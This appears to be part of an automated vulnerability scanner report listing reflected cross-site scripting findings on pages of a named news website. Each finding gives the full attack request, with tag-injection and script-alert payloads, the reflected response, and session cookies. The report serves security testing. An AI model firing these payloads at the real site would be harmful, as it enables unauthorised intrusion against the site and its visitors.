GET /security/article/226700229/index.html3a47c'><a>5fdfbca4d81 HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <html> <head> <title>Six Healt ...[SNIP]... <a href='http://www.darkreading.com/security/article/226700229/index.html3a47c'><a>5fdfbca4d81?fmid=12079'> ...[SNIP]...
3.583. http://www.darkreading.com/security/article/226700229/index.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.darkreading.com
Path:
/security/article/226700229/index.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e9198"><script>alert(1)</script>56c57a0601f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /security/article/226700229/index.html?e9198"><script>alert(1)</script>56c57a0601f=1 HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 147ba"><a>904f6e80a4 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /security/article147ba"><a>904f6e80a4/226700529/index.html HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 59a95"><a>51624165584 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /security/article/22670052959a95"><a>51624165584/index.html HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 15856"><a>07e263cf669 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /security/article/226700529/index.html15856"><a>07e263cf669 HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload bafe3'><a>9698950fef1 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /security/article/226700529/index.htmlbafe3'><a>9698950fef1 HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e74a6"><a>e69df43313f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /security/articlee74a6"><a>e69df43313f/226900007/index.html HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 13781"><a>8fae11895fc was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /security/article/22690000713781"><a>8fae11895fc/index.html HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 6b7f9'><a>795ff27f70f was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /security/article/226900007/index.html6b7f9'><a>795ff27f70f HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b3d26"><a>21a714eefb1 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /security/article/226900007/index.htmlb3d26"><a>21a714eefb1 HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <html> <head> <title>Tech Insi ...[SNIP]... F%2Fwww.darkreading.com%2Fsecurity%2Farticle%2F226900007%2Findex.htmlb3d26%22%3E%3Ca%3E21a714eefb1&siteId=300001&successfulLoginRedirect=http://www.darkreading.com/security/article/226900007/index.htmlb3d26"><a>21a714eefb1"> ...[SNIP]...
3.592. http://www.darkreading.com/security/article/226900007/index.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.darkreading.com
Path:
/security/article/226900007/index.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2d6cc"><script>alert(1)</script>4adbf0a8c92 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /security/article/226900007/index.html?2d6cc"><script>alert(1)</script>4adbf0a8c92=1 HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1d89d"><a>c5384af4f83 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /security/article1d89d"><a>c5384af4f83/227300150/index.html HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 804a0"><a>8a47548686 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /security/article/227300150804a0"><a>8a47548686/index.html HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 76cb5'><a>6bc9e7501bf was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /security/article/227300150/index.html76cb5'><a>6bc9e7501bf HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7f567"><a>5c2079e2fb6 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /security/article/227300150/index.html7f567"><a>5c2079e2fb6 HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <html> <head> <title>Tech Insi ...[SNIP]... F%2Fwww.darkreading.com%2Fsecurity%2Farticle%2F227300150%2Findex.html7f567%22%3E%3Ca%3E5c2079e2fb6&siteId=300001&successfulLoginRedirect=http://www.darkreading.com/security/article/227300150/index.html7f567"><a>5c2079e2fb6"> ...[SNIP]...
3.597. http://www.darkreading.com/security/article/227300150/index.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.darkreading.com
Path:
/security/article/227300150/index.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4aaa7"><script>alert(1)</script>7168d09b654 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /security/article/227300150/index.html?4aaa7"><script>alert(1)</script>7168d09b654=1 HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cb8db"><a>fa8effb5f94 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /security/articlecb8db"><a>fa8effb5f94/227500152/index.html HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7b5c3"><a>2d929fa800c was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /security/article/2275001527b5c3"><a>2d929fa800c/index.html HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8cd24"><a>9bde4711cd0 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /security/article/227500152/index.html8cd24"><a>9bde4711cd0 HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 7f6da'><a>fd951a3e86d was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /security/article/227500152/index.html7f6da'><a>fd951a3e86d HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <html> <head> <title>Tech Insi ...[SNIP]... <a href='http://www.darkreading.com/security/article/227500152/index.html7f6da'><a>fd951a3e86d?fmid=12509'> ...[SNIP]...
3.602. http://www.darkreading.com/security/article/227500152/index.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.darkreading.com
Path:
/security/article/227500152/index.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8fbb8"><script>alert(1)</script>2f91976e1b2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /security/article/227500152/index.html?8fbb8"><script>alert(1)</script>2f91976e1b2=1 HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <html> <head> <title>Tech Insi ...[SNIP]... icle%2F227500152%2Findex.html%3F8fbb8%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E2f91976e1b2%3D1&siteId=300001&successfulLoginRedirect=http://www.darkreading.com/security/article/227500152/index.html?8fbb8"><script>alert(1)</script>2f91976e1b2=1"> ...[SNIP]...
3.603. http://www.darkreading.com/security/attacks-breaches [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.darkreading.com
Path:
/security/attacks-breaches
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 10eb7"><script>alert(1)</script>04903b144bd was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /security/attacks-breaches?10eb7"><script>alert(1)</script>04903b144bd=1 HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <html> <head> <title>Attacks/B ...[SNIP]... reading.com%2Fsecurity%2Fattacks-breaches%3F10eb7%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E04903b144bd%3D1&siteId=300001&successfulLoginRedirect=http://www.darkreading.com/security/attacks-breaches?10eb7"><script>alert(1)</script>04903b144bd=1"> ...[SNIP]...
3.604. http://www.darkreading.com/security/client-security [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.darkreading.com
Path:
/security/client-security
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2f721"><script>alert(1)</script>855f3804288 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /security/client-security?2f721"><script>alert(1)</script>855f3804288=1 HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <html> <head> <title>End User/ ...[SNIP]... rkreading.com%2Fsecurity%2Fclient-security%3F2f721%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E855f3804288%3D1&siteId=300001&successfulLoginRedirect=http://www.darkreading.com/security/client-security?2f721"><script>alert(1)</script>855f3804288=1"> ...[SNIP]...
3.605. http://www.darkreading.com/security/encryption [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.darkreading.com
Path:
/security/encryption
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fb6a3"><script>alert(1)</script>12c267aeb98 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /security/encryption?fb6a3"><script>alert(1)</script>12c267aeb98=1 HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <html> <head> <title>Encryptio ...[SNIP]... F%2Fwww.darkreading.com%2Fsecurity%2Fencryption%3Ffb6a3%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E12c267aeb98%3D1&siteId=300001&successfulLoginRedirect=http://www.darkreading.com/security/encryption?fb6a3"><script>alert(1)</script>12c267aeb98=1"> ...[SNIP]...
3.606. http://www.darkreading.com/security/nac [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.darkreading.com
Path:
/security/nac
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 597f5"><script>alert(1)</script>f4a5a6d656f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /security/nac?597f5"><script>alert(1)</script>f4a5a6d656f=1 HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <html> <head> <title>NAC | Dar ...[SNIP]... vice=http%3A%2F%2Fwww.darkreading.com%2Fsecurity%2Fnac%3F597f5%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3Ef4a5a6d656f%3D1&siteId=300001&successfulLoginRedirect=http://www.darkreading.com/security/nac?597f5"><script>alert(1)</script>f4a5a6d656f=1"> ...[SNIP]...
3.607. http://www.darkreading.com/security/perimeter-security [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.darkreading.com
Path:
/security/perimeter-security
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6091e"><script>alert(1)</script>683a45e84b4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /security/perimeter-security?6091e"><script>alert(1)</script>683a45e84b4=1 HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <html> <head> <title>Perimeter ...[SNIP]... ing.com%2Fsecurity%2Fperimeter-security%3F6091e%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E683a45e84b4%3D1&siteId=300001&successfulLoginRedirect=http://www.darkreading.com/security/perimeter-security?6091e"><script>alert(1)</script>683a45e84b4=1"> ...[SNIP]...
3.608. http://www.darkreading.com/security/privacy [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.darkreading.com
Path:
/security/privacy
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 956be"><script>alert(1)</script>8476c924650 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /security/privacy?956be"><script>alert(1)</script>8476c924650=1 HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <html> <head> <title>Privacy | ...[SNIP]... p%3A%2F%2Fwww.darkreading.com%2Fsecurity%2Fprivacy%3F956be%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E8476c924650%3D1&siteId=300001&successfulLoginRedirect=http://www.darkreading.com/security/privacy?956be"><script>alert(1)</script>8476c924650=1"> ...[SNIP]...
3.609. http://www.darkreading.com/security/security-management [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.darkreading.com
Path:
/security/security-management
Issue detail
